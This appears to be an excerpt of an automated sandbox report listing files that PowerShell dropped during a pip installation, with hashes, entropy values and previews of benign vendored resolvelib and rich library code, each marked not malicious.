                                                                                                                                                                                                            Preview:__all__ = ["Mapping", "Sequence"]..try:. from collections.abc import Mapping, Sequence.except ImportError:. from collections import Mapping, Sequence.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5872
                                                                                                                                                                                                            Entropy (8bit):4.271701332969726
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:0wjwxa+DBKw4IPafN5n0vFWUemOCfQN/Eqa/CO8NcReY4tO7exrcnfq+wgDQP3xE:0+TKzeWYcqHOlep+D8QRz
                                                                                                                                                                                                            MD5:5CC7C30A52D73A488EA98BAC48DABAE0
                                                                                                                                                                                                            SHA1:648373AFF62B7088896B462C3E29DE9F2626C39A
                                                                                                                                                                                                            SHA-256:AE856614122D409D1392136E6BAE61F0B74D9F2EEB99EA9511766EF744223F8A
                                                                                                                                                                                                            SHA-512:8FF8B1A3AF9B068767DCDDEF84F1A35D26F81DD069C04EF07F3C0B12822C2054778A05254EE6CAAEA417817F93D1CBCE63BA4CC04B8CAD4300C46BD57780339B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:class AbstractProvider(object):. """Delegate class to provide requirement interface for the resolver.""".. def identify(self, requirement_or_candidate):. """Given a requirement, return an identifier for it... This is used to identify a requirement, e.g. whether two requirements. should have their specifier parts merged.. """. raise NotImplementedError.. def get_preference(. self,. identifier,. resolutions,. candidates,. information,. backtrack_causes,. ):. """Produce a sort key for given requirement based on preference... The preference is defined as "I think this requirement should be. resolved first". The lower the return value is, the more preferred. this group of arguments is... :param identifier: An identifier as returned by ``identify()``. This. identifies the dependency matches of which should be returned.. :param resolutions: Mapping of c
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1583
                                                                                                                                                                                                            Entropy (8bit):4.3321802161461695
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:MJdtvFSaYuaTwKEq3tlYw1oHmM3TOUz7s2Ao24Zd4xwLowHoYwnqmK:IdZhKx1Om0OUzNXv4wLowHoYwnhK
                                                                                                                                                                                                            MD5:69CA45A4C133F015C9A1CA626673390E
                                                                                                                                                                                                            SHA1:83FA722418EA0C838EEF151D861484006CF05997
                                                                                                                                                                                                            SHA-256:7D6F7534A7FE94AF1737B8BA61DFEB7332F941E393DEC73A00A8696931273F71
                                                                                                                                                                                                            SHA-512:B938C1F366350FA94C3D377C461843DD9EEB6A8E0D8BD5EB86ACC4006741B28FB6A237A774431F5D63062EDB95C38A488286F47AB833E11D65D877284B948810
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:class BaseReporter(object):. """Delegate class to provider progress reporting for the resolver.""".. def starting(self):. """Called before the resolution actually starts.""".. def starting_round(self, index):. """Called before each round of resolution starts... The index is zero-based.. """.. def ending_round(self, index, state):. """Called before each round of resolution ends... This is NOT called if the resolution ends at this round. Use `ending`. if you want to report finalization. The index is zero-based.. """.. def ending(self, state):. """Called before the resolution ends successfully.""".. def adding_requirement(self, requirement, parent):. """Called when adding a new requirement into the resolve criteria... :param requirement: The additional requirement to be applied to filter. the available candidaites.. :param parent: The candidate that requires ``requirement`` as
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17592
                                                                                                                                                                                                            Entropy (8bit):4.222845584401402
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:hC5jw+mgruh4Hp5sOuzR7LFM+P3kfvqsnGSkLci5zD9dkLGfygmx:UpwFEvw7LOm7ZZD9dkLGf8x
                                                                                                                                                                                                            MD5:3A1BFAA79B52F6DF34D6D342E21BFED1
                                                                                                                                                                                                            SHA1:2F025C549415600CEA32CCCE6D4DDEFAD418AD4F
                                                                                                                                                                                                            SHA-256:DB06335460467AB6E6708A47F1C1668122A02D2113CFC8E6C013068C204C1C6E
                                                                                                                                                                                                            SHA-512:6AC38473E11D93BF58C559B3D53F73AFCFAB448D5E51A53CAB11C558C2B386E526A3CA69D4474841CD36F3CB64F1872FF6B3C9C91346C99FF9AEF3B01E267E8A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import collections.import operator..from .providers import AbstractResolver.from .structs import DirectedGraph, IteratorMapping, build_iter_view..RequirementInformation = collections.namedtuple(. "RequirementInformation", ["requirement", "parent"].)...class ResolverException(Exception):. """A base class for all exceptions raised by this module... Exceptions derived by this class should all be handled in this module. Any. bubbling pass the resolver should be treated as a bug.. """...class RequirementsConflicted(ResolverException):. def __init__(self, criterion):. super(RequirementsConflicted, self).__init__(criterion). self.criterion = criterion.. def __str__(self):. return "Requirements conflict: {}".format(. ", ".join(repr(r) for r in self.criterion.iter_requirement()),. )...class InconsistentCandidate(ResolverException):. def __init__(self, candidate, criterion):. super(InconsistentCandidate, self).__init__(candida
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4794
                                                                                                                                                                                                            Entropy (8bit):4.525931589447775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:XMW5iwtA0USqyxkW48ZPSrhvWU6+wiiRlXEyXSYCRj:j5iwtA9tP1qPGCO/Rj
                                                                                                                                                                                                            MD5:6441395B12E4D594EE4C925DE48C8FCB
                                                                                                                                                                                                            SHA1:79122CBE9907FD43271BD182776D7EF9902E4284
                                                                                                                                                                                                            SHA-256:215218A1FEAC03F378644884D42D548734D7E3DE5BAC2367C82760ABA098AB6F
                                                                                                                                                                                                            SHA-512:A4CFF5BBE255B6EA959D3133D4877EAA4D6391214F28F6BC3B5FBBC77D9038E1856ADE5439B02EE5941466595382FB57443EF23360950FB04FD9AAF56C0CBB03
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import itertools..from .compat import collections_abc...class DirectedGraph(object):. """A graph structure with directed edges.""".. def __init__(self):. self._vertices = set(). self._forwards = {} # <key> -> Set[<key>]. self._backwards = {} # <key> -> Set[<key>].. def __iter__(self):. return iter(self._vertices).. def __len__(self):. return len(self._vertices).. def __contains__(self, key):. return key in self._vertices.. def copy(self):. """Return a shallow copy of this graph.""". other = DirectedGraph(). other._vertices = set(self._vertices). other._forwards = {k: set(v) for k, v in self._forwards.items()}. other._backwards = {k: set(v) for k, v in self._backwards.items()}. return other.. def add(self, key):. """Add a new vertex to the graph.""". if key in self._vertices:. raise ValueError("vertex exists"). self._vertices.add(key). self._f
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:C++ source, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6090
                                                                                                                                                                                                            Entropy (8bit):4.661592516678406
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:+dIiCAbXttlVARcUdFfldr7AwEA9vgfreyAF778rlS4HjCqgdzdvF41:UIiCAb7fARbdFfliA9vgTvuEJjCqgdz4
                                                                                                                                                                                                            MD5:F434655DDD93988A30786A6B71DDCD9C
                                                                                                                                                                                                            SHA1:D6B97FECE02385EFF2B7A6E2145299C171772C80
                                                                                                                                                                                                            SHA-256:751C6320BF926C5558D2ADC88D232B7E00531EB9B52D90E02CECA0541C226197
                                                                                                                                                                                                            SHA-512:44B4F1E9EAA6B6C8722B506C1412578607310CFCDE524BA47BA34227C026FA1C653A6B0D9BC5616DD01EDF7A1D5DC921ABD7568744D4C5AA111A67090ABFA709
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Rich text and beautiful formatting in the terminal."""..import os.from typing import IO, TYPE_CHECKING, Any, Callable, Optional, Union..from ._extension import load_ipython_extension # noqa: F401..__all__ = ["get_console", "reconfigure", "print", "inspect", "print_json"]..if TYPE_CHECKING:. from .console import Console..# Global console used by alternative print._console: Optional["Console"] = None..try:. _IMPORT_CWD = os.path.abspath(os.getcwd()).except FileNotFoundError:. # Can happen if the cwd has been deleted. _IMPORT_CWD = ""...def get_console() -> "Console":. """Get a global :class:`~rich.console.Console` instance. This function is used when Rich requires a Console,. and hasn't been explicitly given one... Returns:. Console: A console instance.. """. global _console. if _console is None:. from .console import Console.. _console = Console().. return _console...def reconfigure(*args: Any, **kwargs: Any) -> None:. """Reco
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8478
                                                                                                                                                                                                            Entropy (8bit):4.98505476739099
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mXudIS2H0OF0u+g5dZrQHy/YJtn4KcSIcKiJGOZzbarmp3shirjr/NQYN7:mXuyS2UOeu+gA0KcSIcKjODp3shirjrZ
                                                                                                                                                                                                            MD5:743F8BB0D6C8516E67B36E125FD398C0
                                                                                                                                                                                                            SHA1:81633B6E9D2F763A3B26F71EB7BC2B8F4D1C46DB
                                                                                                                                                                                                            SHA-256:4D3F2C6FD3D39EC9CA861AC6B8790B3748DD37476D2A1B4F904AFD0A27436CF3
                                                                                                                                                                                                            SHA-512:3474085F161EBA39B061561D77D42B0509F8CF69C10044009D63D0E4DB4C9BCA2C252261A29975D08AE6D3BD3CF164E95378B0BAF58423E70395EAFECD820A1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import colorsys.import io.from time import process_time..from pip._vendor.rich import box.from pip._vendor.rich.color import Color.from pip._vendor.rich.console import Console, ConsoleOptions, Group, RenderableType, RenderResult.from pip._vendor.rich.markdown import Markdown.from pip._vendor.rich.measure import Measurement.from pip._vendor.rich.pretty import Pretty.from pip._vendor.rich.segment import Segment.from pip._vendor.rich.style import Style.from pip._vendor.rich.syntax import Syntax.from pip._vendor.rich.table import Table.from pip._vendor.rich.text import Text...class ColorBox:. def __rich_console__(. self, console: Console, options: ConsoleOptions. ) -> RenderResult:. for y in range(0, 5):. for x in range(options.max_width):. h = x / options.max_width. l = 0.1 + ((y / 5) * 0.7). r1, g1, b1 = colorsys.hls_to_rgb(h, l, 1.0). r2, g2, b2 = colorsys.hls_to_rgb(h, l + 0.7 / 10, 1.0).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6130
                                                                                                                                                                                                            Entropy (8bit):5.41969554905387
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9zb3qHNl2JXttlSc5VIMpdr7AwEAiyyAF77/HW2S4HjCqgd6BxgQv:1TqHs7UkI2iA6u3NjCqgd6BxgQv
                                                                                                                                                                                                            MD5:6D5277795E4B54295230CC73498C32AF
                                                                                                                                                                                                            SHA1:709AD0E7FC82603221D38EDEA473BEC02A4C162C
                                                                                                                                                                                                            SHA-256:E8161365223ABBFD66E84C780CDFFD68AF4033235DBB4783603E4832497AA8F4
                                                                                                                                                                                                            SHA-512:EB5AA80ABD5832DAE5592E310CA7430386F133E18AF0C09DF09611304EC497667265D7CAAF9630426542211AF2621770DA8C47C1A8DFE5F826B3DEA9156CFB59
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....U.d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e.r)d.d.l.m.Z...d.a.e.d...e.d.<.z.e.j...e.......Z.W.n...e.yF......d.Z.Y.n.w.d<d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.d.d.d.d...d.e.d.e.d.e.d.e.e.e.....d.e.d.d.f.d.d...Z...d=d.d.d.d.d.d.d.d.d.d...d e.e...d!e.d"e.d.e.e.f...d#e.d$e.d%e.d&e.d'e.d(e.e.e.g.e.f.....d)e.d.d.f.d*d+..Z.d.d.d.d.d.d.d.d.d.d.d,..d-e.d.e.d...d/e.e...d0e.d1e.d2e.d3e.d4e.d5e.d6e.d7e.d.d.f.d8d9..Z.e.d:k.r.e.d;....d.S.d.S.)>z3Rich text and beautiful formatting in the terminal......N)...IO..TYPE_CHECKING..Any..Callable..Optional..Union.....)...load_ipython_extension)...get_console..reconfigure..print..inspect..print_json....Consoler......_console....returnc....................C...s....t.d.u.r.d.d.l.m.}...|...a.t.S.).z.Get a global :class:`~rich.console.Console` instance. This function is used when Rich requires a Console,. and hasn't been explicitly given one... Returns:. Console: A console instance..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7200
                                                                                                                                                                                                            Entropy (8bit):6.0441917079925105
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:xfmuEf1UX5V1e3YrVTKviKkZ+GXqnoaWAtB7XBr8Kh2R:xmvf+X5VXrxKviKkZZcoaWAtB7XBr8K2
                                                                                                                                                                                                            MD5:D3B045B9E83C7CDA170F88A20A3A01EB
                                                                                                                                                                                                            SHA1:2131CC8A86339024315746B233E5933C5B87B742
                                                                                                                                                                                                            SHA-256:098CB9422745F7C8D9A03DDAA82231AC4A2328C01D255DBB4F1EF1BF4C36D67C
                                                                                                                                                                                                            SHA-512:45BC1539AB02D471E8E7FC2750A536AB912B230BFC92DD140D532E98F99D092B25605C7BA9BCB6E03F7A68C03BB1418D43D2BC74C55ED1173AC5C159494A7D6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.!.......................@...s ...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.e.f.d.d...Z.e d.k...r.e.e..!..d.d...Z"e...Z#e...Z$e".%e#....e&e...e$..d...d...Z'e..!..e"_(e...Z$e".%e#....e&e...e$..d...d...Z)e.d.d...Z*e*.%e#....e%d.e'..d.......e%d.e)..d.......d.d.l+m,Z,..e...Z"e.j-d.d...Z.e.j/d.d.d ....e.j/d.d!....e..0d"d#....e..0d$d%....e..1d&..Z2e.j-d'd...Z3e3./....e3j/d.d!....e3.0e2e.....e"j%e,j4e3e.j5d(d)d*d+..d,d-....d.S.d.S.)......N)...process_time)...box)...Color)...Console..ConsoleOptions..Group..RenderableType..RenderResult)...Markdown)...Measurement)...Pretty)...Segment)...Style)...Syntax)...Table)...Textc....................@...s8...e.Z.d.Z.d.e.d.e.d.e.f.d.d...Z.d.d.d.e.d.e.f.d.d...Z.d.S.)...ColorBox..console..options..returnc....................c...s......t.d.d...D.]V}.t.|.j...D.]I}.|.|.j...}.d.|.d...d.....}.t...|.|.d...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7831
                                                                                                                                                                                                            Entropy (8bit):4.224528270263311
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:10D2OWNCUYBO1W1iAcr/JMm8GIrvrrfACI:SDC3FtVkrvrrYCI
                                                                                                                                                                                                            MD5:CEF5184EB08052897653A70D10482ACE
                                                                                                                                                                                                            SHA1:DD55F145441F815955F166ECDA5CBD36C72AC367
                                                                                                                                                                                                            SHA-256:698EAD8C56F1A5E68E2C3E7005C0336060354968643A844C4D47D8236D894463
                                                                                                                                                                                                            SHA-512:E6C8DBA2EF884BEC19AA9018C8D4CD8EE701E20918D2D26C87AFB51A5DC59B4AB26D3AFF77F86017085CEAD0841E6162EF7D586CC00CBABDA7AD159E057C2CCB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gp'.......................@...s....g.d...Z.d.S.).(....)......r....r....)................)..........r....).i....io...r....).i....i....r....).i....i....r....).....r....r....).i....i....r....).i....i....r....)......r....r....).i....i....r....).iK...i_...r....)..p...r....r....).i....i....r....).i....i....r....).i....i....r....).i....i....r....)......r....r....).i0...iJ...r....).i....i....r....).i....i....r....)......r....r....).i....i....r....).i....i#...r....).i%...i'...r....).i)...i-...r....).iY...i[...r....).i....i....r....).i....i....r....)..:...r....r....)..<...r....r....).iA...iH...r....)..M...r....r....).iQ...iW...r....).ib...ic...r....).....r....r....).....r....r....).i....i....r....)......r....r....).i....i....r....)......r....r....).i....i....r....)..<...r....r....).iA...iB...r....).iG...iH...r....).iK...iM...r....)..Q...r....r....).ip...iq...r....)..u...r....r....).i....i....r....).....r....r....).i....i....r....).i....i....r....)......r....r....).i....i....r....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):360071
                                                                                                                                                                                                            Entropy (8bit):4.446725170876455
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:vbhhcs0y8xAM24I2o+Ie4G06caMKU6Ma0aMbK2O2:vkAM24I2o+Ie4G06caMKU6Ma0aMbK2O2
                                                                                                                                                                                                            MD5:CCCEE2630FA4769265E9C20E688CE981
                                                                                                                                                                                                            SHA1:8A5DDFEA4C14F71F3805FC78D56E9247AA0332A2
                                                                                                                                                                                                            SHA-256:B1AD84AF56382C933B3B876DE493F7619A52FDD16E314D6C8B6D6605B2099ADA
                                                                                                                                                                                                            SHA-512:9646FFF9F75983D4DE32A3E7A975F9B194F4C7925DE28A6FA784DD2A343436063673EFFCDDA55120F6505F8B16AC656E0B4B5354F1C271B339EA1EDE8A51517C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.#.......................@...sJ...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..i.d"d#..d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC....i.dDdE..dFdG..dHdI..dJdK..dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`da..dbdc..ddde....i.dfdg..dhdi..djdk..dldm..dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d...d.d...d.d...d.d...d.d...d.d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....i...d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1211
                                                                                                                                                                                                            Entropy (8bit):5.512777434255543
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9D4W1K5rTBF1xt2LaYwbqY7nmQbYyRdw+cgvF8:9D4ZFht2GRq30ZRdw+l2
                                                                                                                                                                                                            MD5:7BA08AD51600B0B0276F86903C96726F
                                                                                                                                                                                                            SHA1:B9FBB90CEE97B855DE940996D68E4870F19B9BA0
                                                                                                                                                                                                            SHA-256:72CF58A2C8514638DE564714AACA207B3E26F0C3A50CA63DA9D1278EBEC3A824
                                                                                                                                                                                                            SHA-512:649AB3F1F13612C966C0B9CE56BE8D81F723BE77B2D32123B487972898722C09FF543E078C84A299DD5CC05E47280B84A499B9FB45F4F89E3F1C1CEA51E43E41
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g(........................@...s~...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...e.e...Z.e.e.g.e.f...Z.e.e.e.g.e.f...Z.d.e...d...j.f.d.e.d.e.e...d.e.d.e.f.d.d...Z.d.S.)......)...Callable..Match..OptionalN.....)...EMOJIz!(:(\S*?)(?:(?:\-)(emoji|text))?:)..text..default_variant.._emoji_sub..returnc........................sR...t.j...d.d.d...}.|.j...|.r.|...|.d...n.d...d.t.t...d.t.f.......f.d.d...}.|.|.|...S.).z.Replace emoji code in text.u.....u.....).r......emoji....matchr....c........................s>...|.....\.}.}.}.z...|.........|.......W.S...t.y.......|...Y.S.w.).N)...groups..lower..KeyError).r......emoji_code..emoji_name..variant....default_variant_code..get_emoji..get_variant...vC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_emoji_replace.py..do_replace....s....................z"_emoji_replace.<locals>.do_replace).r......__getitem__..getr......str).r....r....r......variantsr....r....r....r......_emoji_replace....s....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2328
                                                                                                                                                                                                            Entropy (8bit):5.376008478860322
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9RHCI9MVvs/qVsPqrCsFVs3pMTAlCHZaDvvXlQyj2Q:9tUC0UqOaqpMclx7jF
                                                                                                                                                                                                            MD5:636B5AB0EB084C08CA519BAAC3372032
                                                                                                                                                                                                            SHA1:E521E35368EEF3BC2E1BDAD2126FDC8D6AC50AB4
                                                                                                                                                                                                            SHA-256:71BB1899615AC88AFAAC80EFD0EBD5EFC836E34CD0534C510A0B5F89DA9A28D7
                                                                                                                                                                                                            SHA-512:DF13643E7CEC69ED7E21BD51BEEBCDEA909183136050267B0C918F744FC950C2882F0DB938F8A8BC57B588B99064C84C916E7EBB6C0A6776BE7C5A995568D98F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gB........................@...s....d.Z.d.Z.d.Z.d.Z.d.S.).a9...<!DOCTYPE html>.<head>.<meta charset="UTF-8">.<style>.{stylesheet}.body {{. color: {foreground};. background-color: {background};.}}.</style>.</head>.<html>.<body>. <code>. <pre style="font-family:Menlo,'DejaVu Sans Mono',consolas,'Courier New',monospace">{code}</pre>. </code>.</body>.</html>.a....<svg class="rich-terminal" viewBox="0 0 {width} {height}" xmlns="http://www.w3.org/2000/svg">. Generated with Rich https://www.textualize.io -->. <style>.. @font-face {{. font-family: "Fira Code";. src: local("FiraCode-Regular"),. url("https://cdnjs.cloudflare.com/ajax/libs/firacode/6.2.0/woff2/FiraCode-Regular.woff2") format("woff2"),. url("https://cdnjs.cloudflare.com/ajax/libs/firacode/6.2.0/woff/FiraCode-Regular.woff") format("woff");. font-style: normal;. font-weight: 400;. }}. @font-face {{. font-family: "Fira Co
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                                            Entropy (8bit):4.974515509239295
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CQtKYVBTNq6B3h7rfNLxYPxn2QgzJ/2IsatFvz2sS/E:9tpBhqyvNLxYJn23zx2L8vz5S/E
                                                                                                                                                                                                            MD5:6865363980281D8C9693AFF8D70A6CE5
                                                                                                                                                                                                            SHA1:3F241710D8C51753F2152E4F15AC8A58E2B68F7C
                                                                                                                                                                                                            SHA-256:46CE1AC7A69A6D41930EFACD59C93E0E67D68F801B7D4482E57228B7CAE03919
                                                                                                                                                                                                            SHA-512:90DD27B3C702CA16E96E0AE3C99F4AD01FCB91DA94D6D99BA22095180E3F66931998C062F05C46F2BFEB743BD8525DE7CE488D5E28DBC61F20ABBD9093FFFCA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s"...d.d.l.m.Z...d.e.d.d.f.d.d...Z.d.S.)......)...Any..ip..returnNc....................C...s(...d.d.l.m.}...d.d.l.m.}...|.....|.....d.S.).Nr....)...install)...pip._vendor.rich.prettyr......pip._vendor.rich.traceback).r....r......tr_install..r.....rC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_extension.py..load_ipython_extension....s............r....)...typingr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8689
                                                                                                                                                                                                            Entropy (8bit):5.52149254556708
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nmMCq1yjCqgdqb8ZCujHMNz2Mg1pj4Y/pCBYhrTyB9AKEhr:nlslgYWH5Mg3EY/pHhrTynAKEhr
                                                                                                                                                                                                            MD5:A367FD077B5D0B33AFDF266BB99E3D24
                                                                                                                                                                                                            SHA1:2F828D181BD4B938A0FF64BEA8337E82DD9C8071
                                                                                                                                                                                                            SHA-256:323501A2072BB63369D5C3D1FBE260EA52F72CFDD11289526722EF47A09C07DA
                                                                                                                                                                                                            SHA-512:E1D4E0E5770C14F6499A97B042DF83A778950F672DF58773313F242E321F8437A2F30E65DE0A9120020BDB15F461FD0FA3D7081D046CAE3430A2C64C05A3808C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.%.......................@...s<...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!m"Z"..d.e#d.e#f.d.d...Z$G.d.d...d.e...Z%d.e.e&e.e...f...d.e.e'd.f...f.d.d...Z(d.e&d.e.e#..f.d.d...Z)d.e&d.e.e#..d.e*f.d.d...Z+d.S.)......)...absolute_importN)...cleandoc..getdoc..getfile..isclass..ismodule..signature)...Any..Collection..Iterable..Optional..Tuple..Type..Union.....)...Group..RenderableType)...escape_control_codes)...ReprHighlighter)...JupyterMixin)...Panel)...Pretty)...Table)...Text..TextType..doc..returnc....................C...s....|...d...\.}.}.}.|.S.).z)Get the first paragraph from a docstring.z...)...partition).r....Z.paragraph.._..r.....pC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_inspect.py.._first_paragraph....s........r!...c....................@...s....e.Z.d.Z.d.Z.d.d.d.d.d.d.d
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2657
                                                                                                                                                                                                            Entropy (8bit):5.529039582934969
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9dyls/8z+nsC4CLfjPrK2BNBryjPSWFazLLlOa8JuZIUu1p71gw:98Pzo/Lf73NkuW0LlOaigIUulgw
                                                                                                                                                                                                            MD5:C0162C3E5F20AD82683FA4EE1114F2E5
                                                                                                                                                                                                            SHA1:5CE8919E9CCB31130FF615EF03E070422D6C097C
                                                                                                                                                                                                            SHA-256:49AA21F1AE55D362324AED8296E746E2F7BFCC0A17BB96A37BA266F4C06F64F7
                                                                                                                                                                                                            SHA-512:3AD9B305986E681753CD6C12694286A26A28FDD1117AB61534AFBF32C95FC023859274FD886493350029DD9F1EF8981E161CB70D87AF1953E5782C7E5BE7C177
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
